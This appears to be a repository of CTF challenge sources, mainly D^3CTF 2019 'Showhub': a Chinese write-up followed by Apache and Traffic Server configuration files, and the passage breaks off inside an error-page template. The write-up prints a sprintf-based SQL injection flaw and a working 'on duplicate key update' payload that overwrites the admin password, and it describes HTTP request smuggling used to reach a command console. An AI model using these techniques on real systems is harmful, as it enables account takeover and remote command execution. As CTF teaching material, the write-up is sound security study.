├── D^3CTF2019_Showhub
    ├── .gitignore
    ├── README.md
    ├── apache2
    │   ├── 000-default.conf
    │   ├── Dockerfile
    │   └── apache2.conf
    ├── ats-etc
    │   └── trafficserver
    │   │   ├── body_factory
    │   │       └── default
    │   │       │   ├── .body_factory_info
    │   │       │   ├── README
    │   │       │   ├── access#denied
    │   │       │   ├── access#proxy_auth_required
    │   │       │   ├── access#ssl_forbidden
    │   │       │   ├── cache#not_in_cache
    │   │       │   ├── cache#read_error
    │   │       │   ├── congestion#retryAfter
    │   │       │   ├── connect#dns_failed
    │   │       │   ├── connect#failed_connect
    │   │       │   ├── connect#hangup
    │   │       │   ├── default
    │   │       │   ├── interception#no_host
    │   │       │   ├── redirect#moved_permanently
    │   │       │   ├── redirect#moved_temporarily
    │   │       │   ├── request#cycle_detected
    │   │       │   ├── request#invalid_content_length
    │   │       │   ├── request#no_content_length
    │   │       │   ├── request#no_host
    │   │       │   ├── request#scheme_unsupported
    │   │       │   ├── request#syntax_error
    │   │       │   ├── response#bad_response
    │   │       │   ├── response#bad_version
    │   │       │   ├── timeout#activity
    │   │       │   ├── timeout#inactivity
    │   │       │   ├── transcoding#unsupported
    │   │       │   └── urlrouting#no_mapping
    │   │   ├── cache.config
    │   │   ├── cache.config_1
    │   │   ├── cluster.config
    │   │   ├── cluster.config_1
    │   │   ├── congestion.config
    │   │   ├── congestion.config_1
    │   │   ├── hosting.config
    │   │   ├── hosting.config_1
    │   │   ├── icp.config
    │   │   ├── ip_allow.config
    │   │   ├── ip_allow.config_1
    │   │   ├── log_hosts.config
    │   │   ├── log_hosts.config_1
    │   │   ├── logging.config
    │   │   ├── logging.config_1
    │   │   ├── metrics.config
    │   │   ├── metrics.config_1
    │   │   ├── parent.config
    │   │   ├── parent.config_1
    │   │   ├── plugin.config
    │   │   ├── plugin.config_1
    │   │   ├── records.config
    │   │   ├── records.config_1
    │   │   ├── remap.config
    │   │   ├── remap.config_1
    │   │   ├── socks.config
    │   │   ├── socks.config_1
    │   │   ├── splitdns.config
    │   │   ├── splitdns.config_1
    │   │   ├── ssl_multicert.config
    │   │   ├── ssl_multicert.config_1
    │   │   ├── storage.config
    │   │   ├── storage.config_1
    │   │   ├── trafficserver-release
    │   │   ├── vaddrs.config
    │   │   ├── vaddrs.config_1
    │   │   ├── volume.config
    │   │   └── volume.config_1
    ├── docker-compose.yml
    ├── flag
    ├── htdocs
    │   ├── .htaccess
    │   ├── Controllers
    │   │   ├── BaseController.php
    │   │   ├── IndexController.php
    │   │   ├── LoginController.php
    │   │   ├── LogoutController.php
    │   │   ├── ManageController.php
    │   │   ├── RegisterController.php
    │   │   └── WebConsoleController.php
    │   ├── Core
    │   │   ├── App.php
    │   │   ├── Mysql.php
    │   │   ├── Request.php
    │   │   └── framework.php
    │   ├── Models
    │   │   ├── Model.php
    │   │   └── User.php
    │   ├── Templates
    │   │   ├── 403.html
    │   │   ├── 404.html
    │   │   ├── index.html
    │   │   ├── layout.html
    │   │   ├── webconsole.html
    │   │   └── welcome.html
    │   ├── app.sql
    │   ├── composer.json
    │   ├── composer.lock
    │   ├── config.php
    │   ├── index.php
    │   └── static
    │   │   ├── arispods_pro.jpg
    │   │   ├── clothes.jpg
    │   │   └── cosmetics.jpg
    ├── nginx
    │   └── default.conf
    ├── run
    │   ├── apache2.sh
    │   ├── ats.sh
    │   └── nginx.sh
    ├── smuggling_payload
    └── to-player
    │   └── www.tar.gz
├── D^3CTF2021_real_cloud
    ├── .gitattributes
    ├── .images
    │   ├── image-20210309235445715.png
    │   ├── image-20210310161854461.png
    │   ├── image-20210310162429028.png
    │   ├── image-20210310163123500.png
    │   ├── image-20210310185835793.png
    │   └── image-20210311215422732.png
    ├── README.md
    ├── WriteUp.md
    ├── frontend
    │   ├── index.html
    │   └── static
    │   │   ├── css
    │   │       └── tabler.min.css
    │   │   └── js
    │   │       └── tabler.min.js
    ├── k8s
    │   ├── code
    │   │   ├── d3cloud-1.0-SNAPSHOT-jar-with-dependencies.jar
    │   │   └── optionsHandler.py
    │   ├── fission-all-1.11.2.yaml
    │   ├── flag.yaml
    │   ├── initFission.sh
    │   └── nginx.yaml
    ├── oss
    │   ├── Caddyfile
    │   ├── docker-compose.yaml
    │   ├── init.sh
    │   ├── mc
    │   └── minio
    └── payload.json
└── HCTF2018_kzone
    ├── Dockerfile
    ├── README.md
    ├── apache2.conf
    ├── docker-compose.yml
    ├── hctf.sql
    ├── init.sh
    ├── start_up.sh
    ├── uninstall.sh
    └── web
        ├── 2018.php
        ├── Default account&password.txt
        ├── Tutorial.txt
        ├── admin
            ├── delete.php
            ├── index.php
            ├── list.php
            ├── login.php
            └── pass.php
        ├── config.php
        ├── include
            ├── common.php
            ├── db.class.php
            ├── function.php
            ├── kill.intercept.php
            ├── member.php
            ├── os.php
            └── safe.php
        ├── index.php
        ├── install.sql
        ├── robots.txt
        └── www.zip


/D^3CTF2019_Showhub/.gitignore:
--------------------------------------------------------------------------------
1 | **Cache/
2 | !.gitkeep
3 | .idea/
4 | vendor/
5 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/README.md:
--------------------------------------------------------------------------------
 1 | # D^3CTF 2019 Showhub
 2 | 
 3 | ## 题目情况
 4 | 
 5 | | Name | Description | Score|Solved|
 6 | | ------ | ------ | ---- | ---- |
 7 | | Showhub | Showhub is a fashion-focused community built on a self-developed framework.Download this framework here | 880.7 |  2  |
 8 | 
 9 | ## 如何启动
10 | 
11 | ```shell
12 | cd htdocs/
13 | composer install
14 | docker-compose up -d
15 | ```
16 | 
17 | ## 出题思路以及Write Up：
18 | 
19 | ### insert on duplicate key update 注入
20 | 
21 | 题目给出了框架部分的源码，只有基本的 MVC 的实现和用户注册登录的逻辑代码。简单审计一下应该就可以发现在`Model::prepareUpdate`和`Model::prepareInsert`这两个方法中存在`格式化字符串SQL注入`
22 | 
23 | ```php
24 |         static private function ($baseSql, $args)
25 |     {
26 |         $i = 0;
27 |         if (!empty($args)) {
28 |             foreach ($args as $column => $value) {
29 |                 $value = addslashes($value);
30 |                 if ($value !== null) {
31 |                     if ($i !== count($args) - 1) {
32 |                         $baseSql = sprintf($baseSql, "`$column`,%s", "'$value',%s");
33 |                     } else {
34 |                         $baseSql = sprintf($baseSql, "`$column`", "'$value'");
35 |                     }
36 |                 }
37 |                 $i++;
38 |             }
39 |         }
40 | 
41 |         return $baseSql;
42 |     }
43 | 
44 |     static private function prepareUpdate($baseSql, $args)
45 |     {
46 |         $i = 0;
47 |         if (!empty($args)) {
48 |             foreach ($args as $column => $value) {
49 |                 $value = addslashes($value);
50 |                 if ($value !== null) {
51 |                     if ($i !== count($args) - 1) {
52 |                         $baseSql = sprintf($baseSql, "`$column`='$value',%s");
53 |                     } else {
54 |                         $baseSql = sprintf($baseSql, "`$column`='$value'");
55 |                     }
56 |                 }
57 |                 $i++;
58 |             }
59 |         }
60 | 
61 |         return $baseSql;
62 |     }
63 | ```
64 | 
65 | 而只有`prepareInsert`方法在用户注册时被触发了，那么我们就拥有了一个`insert`注入。这时候大多数人第一时间的想法都是通过`insert`时间盲注注出管理员密码。然而管理员的密码强度足够，并不能根据其hash值推出明文。
66 | 
67 | 这时候就涉及到了一个比较冷门的`insert`注入技巧，就是 `insert on duplicate key update` ，它能够让我们在新插入的一个数据和原有数据发生重复时，修改原有数据。那么我们通过这个技巧修改管理员的密码即可。
68 | 
69 | payload：`admin%1$',0x60) on duplicate key update password=0x38643936396565663665636164336332396133613632393238306536383663663063336635643561383661666633636131323032306339323361646336633932#`
70 | 
71 | ### HTTP走私
72 | 
73 | 成为管理员之后，还需要满足`Client-IP` 为内网 IP。因为这里的`Client-IP`头是反代层面设置的（set $Client-IP $remote_addr）, 所以无法通过前端修改请求头来伪造。
74 | 
75 | 这时可以从服务器返回的`Server`头中发现，反代是`ATS7.1.2` 那么应该很敏感的想到通过`HTTP走私` 来绕过反代，规避反代设置`Client-IP`。这里需要构造两次走私，一次是访问`/WebConsole`拿到执行命令的接口，一次是访问接口执行命令，构造走私`payload`的过程很有意思，但是嘴上说起来就索然无味了，所以我这里就直接放出我最终的`payload`，不再多说这部分都有哪些坑了，真正有兴趣的同学强烈建议先别看`payload`，自己动手实践一下。
76 | 
77 | [payload](./smuggling_payload)
78 | 
79 | ### 拓展
80 | 
81 | 在当前题目的环境基础上进行少量修改，走私的情况就会发生微小的变化，可能会导致部分`payload`失效。探究这些变化发生的原因，可以帮助你更深入的理解`HTTP走私`，也可能会帮助你发现一些有趣的特性~，欢迎并期待各位师傅随时找我探讨。
82 | 
83 | 1. 在`htdocs/Controllers/WebConsoleController.php`将判断内网ip的代码改成直接与`"127.0.0.1"`进行比较(不影响我给出的`payload`，但影响网上流传的部分`payload`)
84 | 
85 | 2. 尝试修改`ats-etc/trafficserver/remap.config` 内的配置，使`ATS` 直接反代`Apache`(影响我上面给出的`payload`)
86 | 
87 | ## 感谢
88 | 
89 | 感谢@spine、@Alias、@Annevi 、@E99plant在出题过程中对我的帮助。
90 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/apache2/000-default.conf:
--------------------------------------------------------------------------------
 1 | <VirtualHost *:80>
 2 | 	# The ServerName directive sets the request scheme, hostname and port that
 3 | 	# the server uses to identify itself. This is used when creating
 4 | 	# redirection URLs. In the context of virtual hosts, the ServerName
 5 | 	# specifies what hostname must appear in the request's Host: header to
 6 | 	# match this virtual host. For the default virtual host (this file) this
 7 | 	# value is not decisive as it is used as a last resort host regardless.
 8 | 	# However, you must set it for any further virtual host explicitly.
 9 | 	#ServerName www.example.com
10 | 
11 | 	ServerAdmin webmaster@localhost
12 | 	DocumentRoot /var/www/html
13 | 
14 | 	# Available loglevels: trace8, ..., trace1, debug, info, notice, warn,
15 | 	# error, crit, alert, emerg.
16 | 	# It is also possible to configure the loglevel for particular
17 | 	# modules, e.g.
18 | 	#LogLevel info ssl:warn
19 | 	<Directory "/var/www/html">
20 | 		Options -Indexes +FollowSymlinks
21 |                 AllowOverride All
22 |                 Require all granted
23 | 	</Directory>
24 | 
25 | 	ErrorLog ${APACHE_LOG_DIR}/error.log
26 | 	CustomLog ${APACHE_LOG_DIR}/access.log combined
27 | 
28 | 	# For most configuration files from conf-available/, which are
29 | 	# enabled or disabled at a global level, it is possible to
30 | 	# include a line for only one particular virtual host. For example the
31 | 	# following line enables the CGI configuration for this host only
32 | 	# after it has been globally disabled with "a2disconf".
33 | 	#Include conf-available/serve-cgi-bin.conf
34 | </VirtualHost>
35 | 
36 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/apache2/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM ubuntu:18.04
 2 | 
 3 | #更换apt源
 4 | RUN sed -i "s/security.ubuntu.com/mirrors.tuna.tsinghua.edu.cn/g" /etc/apt/sources.list && sed -i "s/archive.ubuntu.com/mirrors.tuna.tsinghua.edu.cn/g" /etc/apt/sources.list
 5 | #RUN sed -i "s/ppa\.launchpad\.net/lanuchpad.moruy.cn/g" /etc/apt/sources.list.d/*.list
 6 | #安装更新及安装必备软件
 7 | RUN apt-get update && export DEBIAN_FRONTEND=noninteractive  &&  apt-get install -y apt-utils apache2 mysql-client php7.2 libapache2-mod-php vim curl
 8 | RUN apt-get -y upgrade && apt-get -y install php7.2-curl php7.2-mysqli php7.2-gd php7.2-mbstring php7.2-xml php7.2-curl
 9 | 
10 | #修改apache2配置
11 | RUN rm -rf /etc/apache2/apache2.conf /etc/apache2/sites-available/000-default.conf /etc/apache2/sites-enabled/000-default.conf
12 | COPY 000-default.conf /etc/apache2/sites-available/000-default.conf 
13 | COPY apache2.conf /etc/apache2/apache2.conf
14 | RUN chmod 644 /etc/apache2/apache2.conf /etc/apache2/sites-available/000-default.conf && ln -s /etc/apache2/sites-available/000-default.conf /etc/apache2/sites-enabled
15 | RUN a2enmod rewrite
16 | USER root
17 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/apache2/apache2.conf:
--------------------------------------------------------------------------------
  1 | # This is the main Apache server configuration file.  It contains the
  2 | # configuration directives that give the server its instructions.
  3 | # See http://httpd.apache.org/docs/2.4/ for detailed information about
  4 | # the directives and /usr/share/doc/apache2/README.Debian about Debian specific
  5 | # hints.
  6 | #
  7 | #
  8 | # Summary of how the Apache 2 configuration works in Debian:
  9 | # The Apache 2 web server configuration in Debian is quite different to
 10 | # upstream's suggested way to configure the web server. This is because Debian's
 11 | # default Apache2 installation attempts to make adding and removing modules,
 12 | # virtual hosts, and extra configuration directives as flexible as possible, in
 13 | # order to make automating the changes and administering the server as easy as
 14 | # possible.
 15 | 
 16 | # It is split into several files forming the configuration hierarchy outlined
 17 | # below, all located in the /etc/apache2/ directory:
 18 | #
 19 | #	/etc/apache2/
 20 | #	|-- apache2.conf
 21 | #	|	`--  ports.conf
 22 | #	|-- mods-enabled
 23 | #	|	|-- *.load
 24 | #	|	`-- *.conf
 25 | #	|-- conf-enabled
 26 | #	|	`-- *.conf
 27 | # 	`-- sites-enabled
 28 | #	 	`-- *.conf
 29 | #
 30 | #
 31 | # * apache2.conf is the main configuration file (this file). It puts the pieces
 32 | #   together by including all remaining configuration files when starting up the
 33 | #   web server.
 34 | #
 35 | # * ports.conf is always included from the main configuration file. It is
 36 | #   supposed to determine listening ports for incoming connections which can be
 37 | #   customized anytime.
 38 | #
 39 | # * Configuration files in the mods-enabled/, conf-enabled/ and sites-enabled/
 40 | #   directories contain particular configuration snippets which manage modules,
 41 | #   global configuration fragments, or virtual host configurations,
 42 | #   respectively.
 43 | #
 44 | #   They are activated by symlinking available configuration files from their
 45 | #   respective *-available/ counterparts. These should be managed by using our
 46 | #   helpers a2enmod/a2dismod, a2ensite/a2dissite and a2enconf/a2disconf. See
 47 | #   their respective man pages for detailed information.
 48 | #
 49 | # * The binary is called apache2. Due to the use of environment variables, in
 50 | #   the default configuration, apache2 needs to be started/stopped with
 51 | #   /etc/init.d/apache2 or apache2ctl. Calling /usr/bin/apache2 directly will not
 52 | #   work with the default configuration.
 53 | 
 54 | 
 55 | # Global configuration
 56 | #
 57 | 
 58 | #
 59 | # ServerRoot: The top of the directory tree under which the server's
 60 | # configuration, error, and log files are kept.
 61 | #
 62 | # NOTE!  If you intend to place this on an NFS (or otherwise network)
 63 | # mounted filesystem then please read the Mutex documentation (available
 64 | # at <URL:http://httpd.apache.org/docs/2.4/mod/core.html#mutex>);
 65 | # you will save yourself a lot of trouble.
 66 | #
 67 | # Do NOT add a slash at the end of the directory path.
 68 | #
 69 | #ServerRoot "/etc/apache2"
 70 | 
 71 | #
 72 | # The accept serialization lock file MUST BE STORED ON A LOCAL DISK.
 73 | #
 74 | #Mutex file:${APACHE_LOCK_DIR} default
 75 | 
 76 | #
 77 | # The directory where shm and other runtime files will be stored.
 78 | #
 79 | 
 80 | DefaultRuntimeDir ${APACHE_RUN_DIR}
 81 | 
 82 | #
 83 | # PidFile: The file in which the server should record its process
 84 | # identification number when it starts.
 85 | # This needs to be set in /etc/apache2/envvars
 86 | #
 87 | PidFile ${APACHE_PID_FILE}
 88 | 
 89 | #
 90 | # Timeout: The number of seconds before receives and sends time out.
 91 | #
 92 | Timeout 300
 93 | 
 94 | #
 95 | # KeepAlive: Whether or not to allow persistent connections (more than
 96 | # one request per connection). Set to "Off" to deactivate.
 97 | #
 98 | KeepAlive On
 99 | 
100 | #
101 | # MaxKeepAliveRequests: The maximum number of requests to allow
102 | # during a persistent connection. Set to 0 to allow an unlimited amount.
103 | # We recommend you leave this number high, for maximum performance.
104 | #
105 | MaxKeepAliveRequests 100
106 | 
107 | #
108 | # KeepAliveTimeout: Number of seconds to wait for the next request from the
109 | # same client on the same connection.
110 | #
111 | KeepAliveTimeout 5
112 | 
113 | 
114 | # These need to be set in /etc/apache2/envvars
115 | User ${APACHE_RUN_USER}
116 | Group ${APACHE_RUN_GROUP}
117 | 
118 | #
119 | # HostnameLookups: Log the names of clients or just their IP addresses
120 | # e.g., www.apache.org (on) or 204.62.129.132 (off).
121 | # The default is off because it'd be overall better for the net if people
122 | # had to knowingly turn this feature on, since enabling it means that
123 | # each client request will result in AT LEAST one lookup request to the
124 | # nameserver.
125 | #
126 | HostnameLookups Off
127 | 
128 | # ErrorLog: The location of the error log file.
129 | # If you do not specify an ErrorLog directive within a <VirtualHost>
130 | # container, error messages relating to that virtual host will be
131 | # logged here.  If you *do* define an error logfile for a <VirtualHost>
132 | # container, that host's errors will be logged there and not here.
133 | #
134 | ErrorLog ${APACHE_LOG_DIR}/error.log
135 | 
136 | #
137 | # LogLevel: Control the severity of messages logged to the error_log.
138 | # Available values: trace8, ..., trace1, debug, info, notice, warn,
139 | # error, crit, alert, emerg.
140 | # It is also possible to configure the log level for particular modules, e.g.
141 | # "LogLevel info ssl:warn"
142 | #
143 | LogLevel warn
144 | 
145 | # Include module configuration:
146 | IncludeOptional mods-enabled/*.load
147 | IncludeOptional mods-enabled/*.conf
148 | 
149 | # Include list of ports to listen on
150 | Include ports.conf
151 | 
152 | 
153 | # Sets the default security model of the Apache2 HTTPD server. It does
154 | # not allow access to the root filesystem outside of /usr/share and /var/www.
155 | # The former is used by web applications packaged in Debian,
156 | # the latter may be used for local directories served by the web server. If
157 | # your system is serving content from a sub-directory in /srv you must allow
158 | # access here, or in any related virtual host.
159 | <Directory />
160 | 	Options FollowSymLinks
161 | 	AllowOverride None
162 | 	Require all denied
163 | </Directory>
164 | 
165 | <Directory /usr/share>
166 | 	AllowOverride None
167 | 	Require all granted
168 | </Directory>
169 | 
170 | <Directory /home/ctf/workdir>
171 | 	Options Indexes FollowSymLinks
172 | 	AllowOverride All
173 | 	Require all granted
174 | </Directory>
175 | 
176 | #<Directory /srv/>
177 | #	Options Indexes FollowSymLinks
178 | #	AllowOverride None
179 | #	Require all granted
180 | #</Directory>
181 | 
182 | 
183 | 
184 | 
185 | # AccessFileName: The name of the file to look for in each directory
186 | # for additional configuration directives.  See also the AllowOverride
187 | # directive.
188 | #
189 | AccessFileName .htaccess
190 | 
191 | #
192 | # The following lines prevent .htaccess and .htpasswd files from being
193 | # viewed by Web clients.
194 | #
195 | <FilesMatch "^\.ht">
196 | 	Require all denied
197 | </FilesMatch>
198 | 
199 | 
200 | #
201 | # The following directives define some format nicknames for use with
202 | # a CustomLog directive.
203 | #
204 | # These deviate from the Common Log Format definitions in that they use %O
205 | # (the actual bytes sent including headers) instead of %b (the size of the
206 | # requested file), because the latter makes it impossible to detect partial
207 | # requests.
208 | #
209 | # Note that the use of %{X-Forwarded-For}i instead of %h is not recommended.
210 | # Use mod_remoteip instead.
211 | #
212 | LogFormat "%v:%p %h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" vhost_combined
213 | LogFormat "%h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" combined
214 | LogFormat "%h %l %u %t \"%r\" %>s %O" common
215 | LogFormat "%{Referer}i -> %U" referer
216 | LogFormat "%{User-agent}i" agent
217 | 
218 | # Include of directories ignores editors' and dpkg's backup files,
219 | # see README.Debian for details.
220 | 
221 | # Include generic snippets of statements
222 | IncludeOptional conf-enabled/*.conf
223 | 
224 | # Include the virtual host configurations:
225 | IncludeOptional sites-enabled/*.conf
226 | 
227 | # vim: syntax=apache ts=4 sw=4 sts=4 sr noet
228 | ServerName localhost:80
229 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/ats-etc/trafficserver/body_factory/default/.body_factory_info:
--------------------------------------------------------------------------------
 1 | # .body_factory_info
 2 | #
 3 | # The .body_factory_info file contains descriptive information
 4 | # about the error pages in this directory.
 5 | #
 6 | # Currently, .body_factory_info contains information which
 7 | # indicates the character set and natural language of the error
 8 | # pages in this directory.  For example, to describe Korean
 9 | # web pages encoded in the iso-2022-kr character set, you might
10 | # add these lines to .body_factory_info file:
11 | #
12 | #	Content-Language: kr
13 | #	Content-Charset: iso-2022-kr
14 | #
15 | # If this file is empty, or only contains comments, the default is
16 | # assumed: English text in the standard utf-8 character set.
17 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/ats-etc/trafficserver/body_factory/default/README:
--------------------------------------------------------------------------------
 1 | This directory contains customizable error page templates for the
 2 | Apache Traffic Server.
 3 | 
 4 | You can edit the files in this directory to customized HTML error
 5 | response pages.  The HTML bodies can include ATS logging format
 6 | fields, which will be replaced by the current values before the pages
 7 | are served to the user.
 8 | 
 9 | You can also include sets of directories, each in a different language,
10 | for serving multi-lingual error pages.
11 | 
12 | Each directory of error pages include a .body_factory_info file, which
13 | contains optional information about the language and character set of
14 | the error page contents.
15 | 
16 | See the Traffic Server Administrator's Guide and Release Notes for more
17 | information.
18 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/ats-etc/trafficserver/body_factory/default/access#denied:
--------------------------------------------------------------------------------
 1 | <HTML>
 2 | <HEAD>
 3 | <TITLE>Access Denied</TITLE>
 4 | </HEAD>
 5 | 
 6 | <BODY BGCOLOR="white" FGCOLOR="black">
 7 | <H1>Access Denied</H1>
 8 | <HR>
 9 | 
10 | <FONT FACE="Helvetica,Arial"><B>
11 | Description: You are not allowed to access the document you requested.
12 | </B></FONT>
13 | <HR>
14 | </BODY>
15 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/ats-etc/trafficserver/body_factory/default/access#proxy_auth_required:
--------------------------------------------------------------------------------
 1 | <HTML>
 2 | <HEAD>
 3 | <TITLE>Proxy Authentication Required</TITLE>
 4 | </HEAD>
 5 | 
 6 | <BODY BGCOLOR="white" FGCOLOR="black">
 7 | <H1>Proxy Authentication Required</H1>
 8 | <HR>
 9 | 
10 | <FONT FACE="Helvetica,Arial"><B>
11 | Description: Please login with username and password.
12 | </B></FONT>
13 | <HR>
14 | </BODY>
15 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/ats-etc/trafficserver/body_factory/default/access#ssl_forbidden:
--------------------------------------------------------------------------------
 1 | <HTML>
 2 | <HEAD>
 3 | <TITLE>SSL Port Forbidden</TITLE>
 4 | </HEAD>
 5 | 
 6 | <BODY BGCOLOR="white" FGCOLOR="black">
 7 | <H1>SSL Port Forbidden</H1>
 8 | <HR>
 9 | 
10 | <FONT FACE="Helvetica,Arial"><B>
11 | Description: You have made a request for a secure SSL connection to a
12 | forbidden port number.
13 | </B></FONT>
14 | <HR>
15 | </BODY>
16 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/ats-etc/trafficserver/body_factory/default/cache#not_in_cache:
--------------------------------------------------------------------------------
 1 | <HTML>
 2 | <HEAD>
 3 | <TITLE>Not In Cache</TITLE>
 4 | </HEAD>
 5 | 
 6 | <BODY BGCOLOR="white" FGCOLOR="black">
 7 | <H1>Not In Cache</H1>
 8 | <HR>
 9 | 
10 | <FONT FACE="Helvetica,Arial"><B>
11 | Description: Your request mandated that the document come from cache, but
12 | the document is not present in cache.  As requested, the transaction
13 | is being terminated.
14 | </B></FONT>
15 | <HR>
16 | </BODY>
17 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/ats-etc/trafficserver/body_factory/default/cache#read_error:
--------------------------------------------------------------------------------
 1 | <HTML>
 2 | <HEAD>
 3 | <TITLE>Temporary Error</TITLE>
 4 | </HEAD>
 5 | 
 6 | <BODY BGCOLOR="white" FGCOLOR="black">
 7 | <H1>Temporary Error</H1>
 8 | <HR>
 9 | 
10 | <FONT FACE="Helvetica,Arial"><B>
11 | Description: Temporary error.  Please try again later.
12 | </B></FONT>
13 | <HR>
14 | </BODY>
15 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/ats-etc/trafficserver/body_factory/default/congestion#retryAfter:
--------------------------------------------------------------------------------
 1 | <HTML>
 2 | <HEAD>
 3 | <TITLE>Service Unavailable</TITLE>
 4 | </HEAD>
 5 | 
 6 | <BODY BGCOLOR="white" FGCOLOR="black">
 7 | <H1>Service Unavailable</H1>
 8 | <HR>
 9 | 
10 | <FONT FACE="Helvetica,Arial"><B>
11 | Description:  Service Unavailable <BR>
12 | Retry After: %<crat> seconds
13 | </B></FONT>
14 | <HR>
15 | </BODY>
16 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/ats-etc/trafficserver/body_factory/default/connect#dns_failed:
--------------------------------------------------------------------------------
 1 | <HTML>
 2 | <HEAD>
 3 | <TITLE>Unknown Host</TITLE>
 4 | </HEAD>
 5 | 
 6 | <BODY BGCOLOR="white" FGCOLOR="black">
 7 | <H1>Unknown Host</H1>
 8 | <HR>
 9 | 
10 | <FONT FACE="Helvetica,Arial"><B>
11 | Description: Unable to locate the server requested ---
12 | the server does not have a DNS entry.  Perhaps there is a misspelling
13 | in the server name, or the server no longer exists.  Double-check the
14 | name and try again.
15 | </B></FONT>
16 | <HR>
17 | </BODY>
18 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/ats-etc/trafficserver/body_factory/default/connect#failed_connect:
--------------------------------------------------------------------------------
 1 | <HTML>
 2 | <HEAD>
 3 | <TITLE>Could Not Connect</TITLE>
 4 | </HEAD>
 5 | 
 6 | <BODY BGCOLOR="white" FGCOLOR="black">
 7 | <H1>Could Not Connect</H1>
 8 | <HR>
 9 | 
10 | <FONT FACE="Helvetica,Arial"><B>
11 | Description: Could not connect to the requested server host.
12 | </B></FONT>
13 | <HR>
14 | </BODY>
15 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/ats-etc/trafficserver/body_factory/default/connect#hangup:
--------------------------------------------------------------------------------
 1 | <HTML>
 2 | <HEAD>
 3 | <TITLE>Server Connection Closed</TITLE>
 4 | </HEAD>
 5 | 
 6 | <BODY BGCOLOR="white" FGCOLOR="black">
 7 | <H1>Server Connection Closed</H1>
 8 | <HR>
 9 | 
10 | <FONT FACE="Helvetica,Arial"><B>
11 | Description: The server requested closed the connection before
12 | the transaction was completed.
13 | </B></FONT>
14 | <HR>
15 | </BODY>
16 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/ats-etc/trafficserver/body_factory/default/default:
--------------------------------------------------------------------------------
 1 | <HTML>
 2 | <HEAD>
 3 | <TITLE>Error</TITLE>
 4 | </HEAD>
 5 | 
 6 | <BODY BGCOLOR="white" FGCOLOR="black">
 7 | <H1>Error</H1>
 8 | <HR>
 9 | 
10 | <FONT FACE="Helvetica,Arial"><B>
11 | Description: Could not process this request.
12 | </B></FONT>
13 | <HR>
14 | </BODY>
15 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/ats-etc/trafficserver/body_factory/default/interception#no_host:
--------------------------------------------------------------------------------
 1 | <HTML>
 2 | <HEAD>
 3 | <TITLE>Host Header Required</TITLE>
 4 | </HEAD>
 5 | 
 6 | <BODY BGCOLOR="white" FGCOLOR="black">
 7 | <H1>Host Header Required</H1>
 8 | <HR>
 9 | 
10 | <FONT FACE="Helvetica,Arial"><B>
11 | Description: An attempt was made to transparently proxy your request, 
12 | but this attempt failed because your browser did not send an HTTP "Host"
13 | header.  To access this web site correctly, you will need to upgrade to
14 | a browser that supports the HTTP "Host" header field.
15 | </B></FONT>
16 | <HR>
17 | </BODY>
18 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/ats-etc/trafficserver/body_factory/default/redirect#moved_permanently:
--------------------------------------------------------------------------------
 1 | <HTML>
 2 | <HEAD>
 3 | <TITLE>Document Has Moved</TITLE>
 4 | </HEAD>
 5 | 
 6 | <BODY BGCOLOR="white" FGCOLOR="black">
 7 | <H1>Document Has Moved</H1>
 8 | <HR>
 9 | 
10 | <FONT FACE="Helvetica,Arial"><B>
11 | Description: The document you requested has moved to a new location.  The new location is "%<{Location}epsh>".
12 | </B></FONT>
13 | <HR>
14 | </BODY>
15 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/ats-etc/trafficserver/body_factory/default/redirect#moved_temporarily:
--------------------------------------------------------------------------------
 1 | <HTML>
 2 | <HEAD>
 3 | <TITLE>Document Has Moved</TITLE>
 4 | </HEAD>
 5 | 
 6 | <BODY BGCOLOR="white" FGCOLOR="black">
 7 | <H1>Document Has Moved</H1>
 8 | <HR>
 9 | 
10 | <FONT FACE="Helvetica,Arial"><B>
11 | Description: The document you requested has moved to a new location.  The new location is "%<{Location}epsh>".
12 | </B></FONT>
13 | <HR>
14 | </BODY>
15 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/ats-etc/trafficserver/body_factory/default/request#cycle_detected:
--------------------------------------------------------------------------------
 1 | <HTML>
 2 | <HEAD>
 3 | <TITLE>Cycle Prohibited</TITLE>
 4 | </HEAD>
 5 | 
 6 | <BODY BGCOLOR="white" FGCOLOR="black">
 7 | <H1>Cycle Prohibited</H1>
 8 | <HR>
 9 | 
10 | <FONT FACE="Helvetica,Arial"><B>
11 | Description: Could not process your request for the document 
12 | because it would cause an HTTP proxy cycle.  Please check the URL and your
13 | browser's proxy settings.
14 | </B></FONT>
15 | <HR>
16 | </BODY>
17 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/ats-etc/trafficserver/body_factory/default/request#invalid_content_length:
--------------------------------------------------------------------------------
 1 | <HTML>
 2 | <HEAD>
 3 | <TITLE>Invalid Content Length</TITLE>
 4 | </HEAD>
 5 | 
 6 | <BODY BGCOLOR="white" FGCOLOR="black">
 7 | <H1>Invalid Content Length</H1>
 8 | <HR>
 9 | 
10 | <FONT FACE="Helvetica,Arial"><B>
11 | Description: Could not process this request because
12 | the specified Content-Length was invalid (less than 0).
13 | </B></FONT>
14 | <HR>
15 | </BODY>
16 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/ats-etc/trafficserver/body_factory/default/request#no_content_length:
--------------------------------------------------------------------------------
 1 | <HTML>
 2 | <HEAD>
 3 | <TITLE>No Content Length</TITLE>
